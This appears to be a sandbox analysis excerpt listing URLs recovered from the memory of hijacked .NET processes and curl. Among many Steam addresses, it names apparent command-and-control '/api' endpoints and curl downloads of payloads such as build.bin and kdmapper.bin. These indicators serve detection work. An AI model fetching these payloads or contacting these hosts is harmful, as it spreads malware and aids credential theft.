Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://delaylacedmn.site/41
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://delaylacedmn.site/api
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorationmsn.store/
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000925000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1549845649.0000000000923000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000925000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://explorationmsn.store/api
Source: aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://famikyjdiag.site/
Source: aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://famikyjdiag.site/api
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://famikyjdiag.site/apiW
Source: aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://famikyjdiag.site/d1
Source: aspnet_regiis.exe, 00000049.00000003.1535168990.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://famikyjdiag.site/l1
Source: curl.exe, 00000015.00000003.1318656770.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin
Source: curl.exe, 00000015.00000002.1327969489.000001FE19AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin--outputC:
Source: curl.exe, 00000015.00000002.1338068890.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000003.1313373390.000001FE19AD9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000015.00000003.1318656770.000001FE19ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.biny
Source: curl.exe, 00000037.00000002.1497161944.000002E955E40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1494320625.000002E955E52000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1493649612.000002E955E7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/build.bin
Source: curl.exe, 00000037.00000002.1497161944.000002E955E40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/build.bin--outputC:
Source: curl.exe, 00000037.00000003.1493561295.000002E955E79000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.1497355891.000002E955E7A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1493649612.000002E955E7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/build.bin6
Source: curl.exe, 00000037.00000002.1497161944.000002E955E48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/build.binjWs64
Source: curl.exe, 00000029.00000002.1465251483.000001F5B2190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
Source: curl.exe, 00000029.00000002.1465251483.000001F5B2190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
Source: curl.exe, 0000001F.00000002.1397098489.000001EC889A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397126681.000001EC889B6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395498898.000001EC889B6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397098489.000001EC889A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395437445.000001EC889DA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395457647.000001EC889B3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397126681.000001EC889DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
Source: curl.exe, 0000001F.00000002.1397098489.000001EC889A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
Source: curl.exe, 0000001F.00000003.1395366258.000001EC889D9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395437445.000001EC889DA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000002.1397126681.000001EC889DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin9A
Source: curl.exe, 0000001F.00000002.1397098489.000001EC889A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bins
Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.ste0
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/T1
Source: RegAsm.exe, 0000002F.00000002.1500499974.0000000001171000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/api
Source: RegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/apiB
Source: RegAsm.exe, 0000002F.00000002.1504229654.000000000119D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/apiC
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/t1
Source: aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000923000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site:443/api
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://possiwreeste.site/api;
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegAsm.exe, 0000002F.00000002.1500499974.000000000117F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 0000002F.00000002.1499950256.0000000001151000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegAsm.exe, 0000002F.00000002.1499950256.0000000001151000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.1499818933.000000000114E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
Source: aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 0000002F.00000002.1504674574.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577663593.0000000000995000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000903000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565282474.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: aspnet_regiis.exe, 00000049.00000003.1565282474.0000000000985000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1575351683.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000002.1577126857.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1565373079.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://underlinemdsj.site/
Source: aspnet_regiis.exe, 00000049.00000003.1549985382.0000000000930000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000049.00000003.1550070682.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://underlinemdsj.site/api
